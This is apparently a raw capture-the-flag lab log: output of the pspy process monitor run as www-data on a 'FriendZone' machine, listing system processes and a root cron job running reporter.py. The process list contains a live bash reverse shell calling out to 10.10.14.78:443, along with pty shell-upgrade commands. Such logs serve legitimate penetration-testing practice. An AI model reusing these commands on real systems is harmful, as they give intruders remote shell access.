www-data@FriendZone /tmp $ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/11/13 19:03:19 CMD: UID=0    PID=98     |
2020/11/13 19:03:19 CMD: UID=0    PID=9      |
2020/11/13 19:03:19 CMD: UID=0    PID=89     |
2020/11/13 19:03:19 CMD: UID=0    PID=88     |
2020/11/13 19:03:19 CMD: UID=107  PID=870    | /usr/sbin/exim4 -bd -q30m
2020/11/13 19:03:19 CMD: UID=0    PID=863    | /usr/sbin/smbd --foreground --no-process-group
2020/11/13 19:03:19 CMD: UID=0    PID=861    | /usr/sbin/smbd --foreground --no-process-group
2020/11/13 19:03:19 CMD: UID=0    PID=860    | /usr/sbin/smbd --foreground --no-process-group
2020/11/13 19:03:19 CMD: UID=0    PID=82     |
2020/11/13 19:03:19 CMD: UID=0    PID=81     |
2020/11/13 19:03:19 CMD: UID=0    PID=80     |
2020/11/13 19:03:19 CMD: UID=0    PID=8      |
2020/11/13 19:03:19 CMD: UID=0    PID=79     |
2020/11/13 19:03:19 CMD: UID=0    PID=78     |
2020/11/13 19:03:19 CMD: UID=0    PID=77     |
2020/11/13 19:03:19 CMD: UID=0    PID=758    | /usr/sbin/smbd --foreground --no-process-group
2020/11/13 19:03:19 CMD: UID=0    PID=7      |
2020/11/13 19:03:19 CMD: UID=0    PID=6      |
2020/11/13 19:03:19 CMD: UID=0    PID=582    | /usr/sbin/nmbd --foreground --no-process-group
2020/11/13 19:03:19 CMD: UID=0    PID=560    | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=0    PID=499    | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/11/13 19:03:19 CMD: UID=0    PID=489    | /usr/sbin/sshd -D
2020/11/13 19:03:19 CMD: UID=0    PID=482    | /usr/sbin/vsftpd /etc/vsftpd.conf
2020/11/13 19:03:19 CMD: UID=109  PID=471    | /usr/sbin/named -f -4 -u bind
2020/11/13 19:03:19 CMD: UID=102  PID=402    | /usr/sbin/rsyslogd -n
2020/11/13 19:03:19 CMD: UID=0    PID=400    | /lib/systemd/systemd-logind
2020/11/13 19:03:19 CMD: UID=0    PID=4      |
2020/11/13 19:03:19 CMD: UID=103  PID=399    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/11/13 19:03:19 CMD: UID=0    PID=398    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2020/11/13 19:03:19 CMD: UID=0    PID=392    | /usr/bin/VGAuthService
2020/11/13 19:03:19 CMD: UID=0    PID=390    | /usr/lib/accountsservice/accounts-daemon
2020/11/13 19:03:19 CMD: UID=0    PID=388    | /usr/sbin/cron -f
2020/11/13 19:03:19 CMD: UID=33   PID=37653  | ./pspy64
2020/11/13 19:03:19 CMD: UID=0    PID=37637  |
2020/11/13 19:03:19 CMD: UID=0    PID=37628  |
2020/11/13 19:03:19 CMD: UID=0    PID=37608  |
2020/11/13 19:03:19 CMD: UID=0    PID=37563  |
2020/11/13 19:03:19 CMD: UID=33   PID=3686   | /bin/bash
2020/11/13 19:03:19 CMD: UID=33   PID=3685   | python -c import pty; pty.spawn("/bin/bash")
2020/11/13 19:03:19 CMD: UID=33   PID=3678   | bash -i
2020/11/13 19:03:19 CMD: UID=33   PID=3677   | bash -c bash -i >& /dev/tcp/10.10.14.78/443 0>&1
2020/11/13 19:03:19 CMD: UID=33   PID=3676   | sh -c bash -c 'bash -i >& /dev/tcp/10.10.14.78/443 0>&1'
2020/11/13 19:03:19 CMD: UID=33   PID=3666   | /bin/bash
2020/11/13 19:03:19 CMD: UID=33   PID=3665   | python -c import pty; pty.spawn("/bin/bash")
2020/11/13 19:03:19 CMD: UID=33   PID=3664   | sh -c python -c 'import pty; pty.spawn("/bin/bash")'
2020/11/13 19:03:19 CMD: UID=33   PID=3652   | /bin/bash
2020/11/13 19:03:19 CMD: UID=33   PID=3651   | python3 -c import pty; pty.spawn("/bin/bash")
2020/11/13 19:03:19 CMD: UID=33   PID=3650   | sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
2020/11/13 19:03:19 CMD: UID=33   PID=3639   | /bin/bash
2020/11/13 19:03:19 CMD: UID=33   PID=3638   | python3 -c import pty; pty.spawn("/bin/bash")
2020/11/13 19:03:19 CMD: UID=33   PID=3637   | sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
2020/11/13 19:03:19 CMD: UID=33   PID=3628   | /bin/bash
2020/11/13 19:03:19 CMD: UID=33   PID=3627   | python3 -c import pty; pty.spawn("/bin/bash")
2020/11/13 19:03:19 CMD: UID=33   PID=3626   | sh -c python3 -c 'import pty; pty.spawn("/bin/bash")'
2020/11/13 19:03:19 CMD: UID=0    PID=35     |
2020/11/13 19:03:19 CMD: UID=62583 PID=348    | /lib/systemd/systemd-timesyncd
2020/11/13 19:03:19 CMD: UID=101  PID=347    | /lib/systemd/systemd-resolved
2020/11/13 19:03:19 CMD: UID=0    PID=34     |
2020/11/13 19:03:19 CMD: UID=33   PID=3198   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3195   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3186   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3184   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3179   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3148   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3130   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3118   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=33   PID=3111   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=0    PID=30     |
2020/11/13 19:03:19 CMD: UID=0    PID=3      |
2020/11/13 19:03:19 CMD: UID=0    PID=29     |
2020/11/13 19:03:19 CMD: UID=0    PID=28     |
2020/11/13 19:03:19 CMD: UID=0    PID=27     |
2020/11/13 19:03:19 CMD: UID=100  PID=262    | /lib/systemd/systemd-networkd
2020/11/13 19:03:19 CMD: UID=0    PID=260    | /lib/systemd/systemd-udevd
2020/11/13 19:03:19 CMD: UID=0    PID=26     |
2020/11/13 19:03:19 CMD: UID=33   PID=2510   | /usr/sbin/apache2 -k start
2020/11/13 19:03:19 CMD: UID=0    PID=25     |
2020/11/13 19:03:19 CMD: UID=0    PID=24     |
2020/11/13 19:03:19 CMD: UID=0    PID=234    | /usr/bin/vmtoolsd
2020/11/13 19:03:19 CMD: UID=0    PID=232    | /lib/systemd/systemd-journald
2020/11/13 19:03:19 CMD: UID=0    PID=23     |
2020/11/13 19:03:19 CMD: UID=0    PID=22     |
2020/11/13 19:03:19 CMD: UID=0    PID=21     |
2020/11/13 19:03:19 CMD: UID=0    PID=204    |
2020/11/13 19:03:19 CMD: UID=0    PID=203    |
2020/11/13 19:03:19 CMD: UID=0    PID=20     |
2020/11/13 19:03:19 CMD: UID=0    PID=2      |
2020/11/13 19:03:19 CMD: UID=0    PID=19     |
2020/11/13 19:03:19 CMD: UID=0    PID=182    |
2020/11/13 19:03:19 CMD: UID=0    PID=181    |
2020/11/13 19:03:19 CMD: UID=0    PID=180    |
2020/11/13 19:03:19 CMD: UID=0    PID=18     |
2020/11/13 19:03:19 CMD: UID=0    PID=178    |
2020/11/13 19:03:19 CMD: UID=0    PID=177    |
2020/11/13 19:03:19 CMD: UID=0    PID=176    |
2020/11/13 19:03:19 CMD: UID=0    PID=17     |
2020/11/13 19:03:19 CMD: UID=0    PID=16     |
2020/11/13 19:03:19 CMD: UID=0    PID=15     |
2020/11/13 19:03:19 CMD: UID=0    PID=14     |
2020/11/13 19:03:19 CMD: UID=0    PID=13     |
2020/11/13 19:03:19 CMD: UID=0    PID=12     |
2020/11/13 19:03:19 CMD: UID=0    PID=115    |
2020/11/13 19:03:19 CMD: UID=0    PID=11     |
2020/11/13 19:03:19 CMD: UID=0    PID=10     |
2020/11/13 19:03:19 CMD: UID=0    PID=1      | /sbin/init splash
2020/11/13 19:04:01 CMD: UID=0    PID=37663  | /usr/bin/python /opt/server_admin/reporter.py
2020/11/13 19:04:01 CMD: UID=0    PID=37662  | /bin/sh -c /opt/server_admin/reporter.py
2020/11/13 19:04:01 CMD: UID=0    PID=37661  | /usr/sbin/CRON -f
2020/11/13 19:04:33 CMD: UID=107  PID=37665  | /usr/sbin/exim4 -qG
2020/11/13 19:06:01 CMD: UID=0    PID=37669  | /usr/bin/python /opt/server_admin/reporter.py
2020/11/13 19:06:01 CMD: UID=0    PID=37668  | /bin/sh -c /opt/server_admin/reporter.py
2020/11/13 19:06:01 CMD: UID=0    PID=37667  | /usr/sbin/CRON -f
2020/11/13 19:08:01 CMD: UID=0    PID=37673  | /usr/bin/python /opt/server_admin/reporter.py
2020/11/13 19:08:01 CMD: UID=0    PID=37672  | /bin/sh -c /opt/server_admin/reporter.py
2020/11/13 19:08:01 CMD: UID=0    PID=37671  | /usr/sbin/CRON -f
